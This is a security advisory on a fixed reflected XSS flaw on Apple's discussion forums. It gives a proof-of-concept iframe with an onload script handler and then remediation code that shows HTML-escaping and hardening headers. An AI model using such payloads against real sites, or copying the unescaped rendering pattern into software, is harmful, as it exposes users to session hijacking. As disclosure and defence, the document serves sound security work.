Non-Persistent Cross-Site Scripting (XSS) Vulnerability Found in Apple Website

The Apple website is vulnerable to non-persistent cross-site scripting (XSS). The Vulnerability-Lab Team (Alexander F.) discovered a non-persistent input validation vulnerability on the famous Apple vendor website. This vulnerability allows an attacker to hijack user/mod/admin sessions of the portal.

Vulnerability Information:
  • Vulnerability Type: XSS (Non-Persistent)
  • Alert Level: Medium
  • Status: Fixed
  • Discovered by: Vulnerability Lab Team
  • Website: https://discussions.apple.com

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers with required user interaction. For demonstration or
reproduce ...

PoC:

<!-- BEGIN main body -->
<div id="jive-body-main">
    <!-- BEGIN main body column -->
<div id="jive-body-maincol-container">
        <div id="jive-body-maincol">   
<h1 class="apple-account-issue-reported">We're sorry.</h1>     
<div id="apple-sso-error">

    <iframe src="http://www.vulnerability-lab.com"; onload="alert(vulnerabilitylab)" height="800px" width="900px">   <=[x] 

</div><div id="apple-sso-home">
Return to
<a href="https://discussions.apple.com";>Apple Support Communities</a>.                 
</div>
        </div>
    </div>
<!-- END main body column -->
</div>
<!-- END main body -->  
</div>         
<div class="clear"></div>              
<div class="boot"></div>               
</div><!--/content-->  
</div><!--/#main-->
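
The PoC shows markup landing unencoded inside the `apple-sso-error` block; the standard fix is to HTML-encode request-supplied text before writing it there. The following is an added example, not code from Apple, Jive or the Vulnerability-Lab advisory. The function names, the single `message` input, the cookie name and the header values are assumptions; the `apple-sso-error` id and the sample input are taken from the PoC above.

```javascript
// Added example. Hypothetical names: escapeHtml, renderSsoErrorUnsafe,
// renderSsoErrorSafe, hardeningHeaders, and the "message" input.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode every character that can open a tag, close an attribute or start an entity.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// "Before": request-supplied text is concatenated into the error block as markup.
function renderSsoErrorUnsafe(message) {
  return '<div id="apple-sso-error">' + message + '</div>';
}

// "After": the same text is HTML-encoded for the element-content context.
function renderSsoErrorSafe(message) {
  return '<div id="apple-sso-error">' + escapeHtml(message) + '</div>';
}

// Defence in depth if an encoding step is ever missed (values are illustrative):
// the CSP blocks inline event handlers and framing of other origins, and
// HttpOnly keeps the session cookie out of reach of page script.
function hardeningHeaders() {
  return {
    'Content-Security-Policy': "default-src 'self'; script-src 'self'; frame-src 'none'",
    'X-Content-Type-Options': 'nosniff',
    'Set-Cookie': 'session=PLACEHOLDER; HttpOnly; Secure; SameSite=Lax', // hypothetical cookie
  };
}

// Constructed input: the iframe line from the PoC above.
const POC_INPUT =
  '<iframe src="http://www.vulnerability-lab.com"; onload="alert(vulnerabilitylab)" height="800px" width="900px">';

function demo() {
  return {
    unsafe: renderSsoErrorUnsafe(POC_INPUT),
    safe: renderSsoErrorSafe(POC_INPUT),
    headers: hardeningHeaders(),
  };
}

console.log(demo());
```
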
